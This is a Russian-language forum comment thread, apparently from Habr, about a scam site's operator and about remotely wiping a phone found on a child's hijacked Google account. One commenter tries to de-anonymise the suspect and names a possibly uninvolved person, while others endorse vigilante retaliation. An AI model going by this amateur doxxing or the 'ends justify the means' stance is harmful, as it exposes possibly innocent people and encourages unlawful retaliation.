цель оправдывает средства. против таких ребят можно и нужно использовать их же методы. закон написан для хороших, плохим и так пофигу. Восхищаюсь невозмутимостью Искры в комментах, так ловко включил дрозда, "шо капец", но так тупо спалился. "море по колено".
Скорее всего ничего ему у нас не будет, хотя инфы предостаточно. У нас только чуваков могут посадить за битки, причем достаточно одного чека с яндекс денег что бы сказать что они 5 колона (дело было прошлым годом), отжать весь биток и поминай как звали. а маркуса почти посадили за старые заслуги, тоже скам. О дивный новый мир :7
pyrk2142
Сейчас это выглядит относительно понятной ситуацией, но которую все еще можно пытаться поворачивать как «Хакер влез в админку сайта, скачал данные карт», если кто-то очень захочет это сделать. В другой похожей ситуации, которая будет выглядеть уже не так однозначно, исследователь может и проиграть. Белые хакеры ходят по грани, это стоит понимать и помнить.
mukoladerevlo
Я согласен с Вами. также как я согласен что между добром и злом тонкая грань и восприятие этой грани у каждого свое. для этого ведь существуют суды что бы прийти к общему пониманию ситуации. проблема в том, что пока дело дойдет до суда, все следы будут подчищены, все легенды сложены и алиби проработаны. Just one more thing...
submagic
habr.com/ru/post/448810/#comment_20056294
AcidVenom
Выдача гугла по нику ura7887:
раз, два, три, резюме1 и резюме2.
AcidVenom
Подписываемся на Инсту раз ВК нет.
AcidVenom
Деанон дальше:
Юрий Полишко (видимо другой акк), ссылка на продвижение.
AcidVenom
Идем далее, группа heroverin, видимо, занимается накрутками и чем-то еще. Это, ИМХО, ребята из колледжа.
AcidVenom
Конец моего расследования. Оказывается, он может быть и не Юрий, а может на тот момент регистрировал на родственника. В любом случае, я все.
MINYSMOAL
Обвинять человека, который сделал кому-то сайт энто сильно конечно.
TomskikhAA
У меня у ребенка пытались увести гугл аккаунт. И даже можно сказать увели, только не поменяли дополнительный e-mail и телефон. Я восстановил доступ, зашел в аккаунт, а там еще один смарт Мейзу привязан, с пропиской в Кривом роге. Ну для начала я заблокировал его как краденый. А потом еще еще и информацию с него удалил всю… ибо нефиг взламывать чужие аккаунты.
Vilgelm
Справедливости ради вы могли заблокировать покупателя взломанного аккаунта, но не самого взломщика (думаю раз смартфон был привязан, то взламывали ради каких-то игр из Google Play или чего-то в этом духе).
glowingsword
Покупатель взломанного аккаунта:
1. Знает что покупает.
2. Спонсирует взлом аккаунта, то есть является заказчиком взлома, в то время как взломщик — всего лишь исполнитель.
А следовательно жалеть такого персонажа точно не стоит. Можно было бы аппаратно ему смарт навернуть удалённо — не грех было бы и аппарат ему спалить…
Vilgelm
Далеко не обязательно. Допустим я иду и покупаю авторег, а продавец мне подсовывает вместо него взломанный аккаунт (они дешевле). Если не проверять тщательно то можно и не заметить подвоха, а потом оказаться с заблокированным телефоном.
Впрочем, блокировка телефона на Android больших неприятностей не несет все равно.
1c80
А как можно удаленно спалить аппарат? Я что то пропустил?
glowingsword
Никак, к сожалению. А жаль. Гипотетически было бы не плохо на лету изменять прошивку контроллера батареи. Это давало бы возможность уничтожить удалённо девайс, который не должен попасть в чужие руки. Или наказать плохиша, что юзает краденную учётку.
1c80
это ирония была и хорошо, что нельзя, а то после телефона и хату ему спалить захочется и так далее по нарастающей
glowingsword
Тут вы правы. Ворам чужих профилей с игрушками что угодно нехорошее сделать хочется. Это же на святое покушаются. Ладно бы хлебушек воровали, или яблоки в саду…
alsoijw
S-trace
>Можно было бы аппаратно ему смарт навернуть удалённо — не грех было бы и аппарат ему спалить…
А что, нельзя что ли?)
Speakus
Логика, конечно, понятная каждому, но она противоречит закону.
Нельзя в бутылку из под водки наливать яд предполагая, что сам ты знаешь, а грабителям так и надо. За такое накажут и сильно.
Касательно же случая удалённого стирания — из комментария очевиден умысел (а это больший срок чем «по неосторожности»). Т.е. для статьи УК РФ 272 — уже виден умысел, видно уничтожение информации — не хватает только заявления «потерпевшего» чтобы нельзя было съехать на «классную историю я выдумал, а Вы повелись тут».
Конечно, для многих «такой поворот» выглядит несправедливым, но закон именно таков.
S-trace
>Нельзя в бутылку из под водки наливать яд предполагая, что сам ты знаешь, а грабителям так и надо. За такое накажут и сильно.
И это огромная проблема.
>из комментария очевиден умысел
Да, автор комментария умышленно стёр устройство, зарегистрированное на принадлежащий ему аккаунт.
>не хватает только заявления «потерпевшего»
ЩИТО??
Speakus
В кабинете у следователя я бы не рекомендовал придерживаться такой позиции. ИМХО заведомо провальная.
А что вы удивляетесь то? Если будет заявление — органы обязаны его будут принять в обработку. Как правило нарушители закона подкованы в законодательстве лучше чем обыватели ну и наглости им не занимать — поэтому хоть такие случаи и редки, но случаются.
Разумеется нужно будет объяснить следователю каким образом сам «потерпевший» получил доступ к аккаунту.
alsoijw
Speakus
Если считать цену жизни не равной не только де-факто, но и де-юре то возникают другие проблемы. В частности как определять цену этой самой жизни. Что наверняка приведёт к чему-то подобному:
alsoijw
Speakus
Или я не понял Вас или Вы путаете понятия де-юре и де-факто. Если она де-юре не равна — приведите соответствующий закон.
alsoijw
pyrk2142
Например, история о том, что владелец телефона принес его в сервис по объявлению, где попросил настроить, [несколько доказательств среднего уровня, по которым настройщика не найти, но нет явных оснований не верить заявлению], заплатил деньги и ушел. А тут кто-то стер все данные и заблокировал телефон. Виноват настройщик, но данные-то стер другой человек, которого найти проще.
И я абсолютно не уверен, не окажется ли в этой ситуации двух жертв двух разных преступлений, одна из которых оказалась еще и преступником. Понятно, что это очень маловероятно, но я бы не стал так рисковать.
S-trace
Ок, подойдём к этой же проблеме с другого края.
Человек заходит в выписку по своей карте, обнаруживает там записи о покупках в интернет-магазине которые он не совершал. Его действия?
Обратиться в банк и оспорить операции, сделав chargeback?
Сидеть смирно и не обращаться в банк?
Придерживаясь вашей логики, правильный вариант — второй. Ведь иначе вор/мошенник не получит товары, пойдёт напишет заявление о недополученной прибыли и подаст на хозяина карты, так получается?
Speakus
павлин-мавлинмоей логики? Вам не нравится знать как работает закон? Ну можете игнорировать эту информацию.А увидев покупки которые не совершал — можно и нужно их оспаривать. Есть как бы принципиальная разница между:
— стереть устройство которое Вы посчитали устройством злоумышленника
и
— опротестование покупок по своей карте
Впрочем, разница действительно не так уж и велика если Вам кажется, что воры заслуживают смерти…
S-trace
Я придерживаюсь того, что со своими вещами и аккаунтами человек может делать что угодно, до тех пор пока это не является общественно опасным.
То есть, хранить антифриз в водочной бутылке в СВОЁМ холодильнике — почему бы и нет, если все домашние об этом знают и не тронут этот антифриз, а никто посторонний доступа в ЕГО холодильник не имеет. Общественной опасности нет.
Стереть устройство невесть откуда взявшееся в СВОЁМ аккаунте — почему бы и нет, если доступ к этому аккаунту есть (по крайней мере должен быть) ТОЛЬКО у него одного. Общественной опасности нет.
Собрать в гараже бомбу из старых портянок и банок из-под тушёнки — нельзя, поскольку если она случайно/специально сработает то пострадают и соседи которые о ней и знать не могли по сути => общественно опасно.
Speakus
Моя мама как-то рассказывала историю как она, по молодости, справляя новый год в гостях, залезла в чужой холодильник и, увидев там морсик, хлебанула его прям из банки. Оказалась свиная кровь… долго плевалась. Тут можно пожурить, что это вообще не вежливо, что без разрешения залезла, без спроса выпила, да ещё и не в кружку себе налила, а прям из банки.
TomskikhAA
смарт вошел в аккаунт в момент взлома. Скорее всего кто то практиковался. А ломали да, скорее всего ради игр. это ребенка акк. там нет ничего больше.
Vilgelm
Тоже не факт, если логин и пароль увели через какой-нибудь фейк сайт. Могли в таком виде и продать.
А вообще надо двухфакторную через приложение делать и тогда увести будет довольно тяжело.
TomskikhAA
этот логин с паролем ребенок не знает, единственное что он мог сделать — это разрешить какой либо игре доступ к аккаунту.
Авторизация после этого случая двухфактораная; о) просто акк не мой, мой уже давно нормально настроен.
ЗЫ: даже если я удалил инфу и заблокировал тело не хакера, а покупателя, то все равно будет ему урок на будущее.
Vilgelm
Насколько я знаю через доступ приложения привязать телефон к аккаунту не получится. Нужно знать именно логин и пароль.
В случае с Android такая блокировка по идее не должна больших проблем приносить: прошиваем через fastboot и все. Хотя видел на телефонах Asus защиту, типа после перепрошивки нужно ввести пароль от аккаунта, но там можно подождать неделю и войти без пароля. Данные можно восстановить из старого аккаунта, к которому телефон был привязан до этого. Данные типа фотографий можно вытащить через рекавери. Короче час-два и готово.
Вот если бы это был iPhone, то тогда его бы только на запчасти.
pyrk2142
Думаю, что если бы я по какой-то довольно странной причине оказался на месте покупателя, то я бы прикладывал очень много усилий для наказания «хакера» по 272 статье (или той, которая больше подойдет в такой ситуации). Скорее всего, это было бы сложно, а результат был бы сомнительным, но это интересно.
xState_level80
Вы конечно молодцы, но должен заметить, что хакер это вы, а он просто кибер мошенник. Эх эти путаницы с понятием «Хакер»…
glowingsword
С 60-х у этого слова было столько разных смысловых нагрузок(от людей, хакавших игрушечную железную дорогу до ветеранов движения OpenSource, и просто специалистов и энтузиастов того, или иного вида деятельности, сделавших нечто крутое), что теперь даже эксперты не скажут вам точно, что именно подразумевают разные группы лиц под данным термином.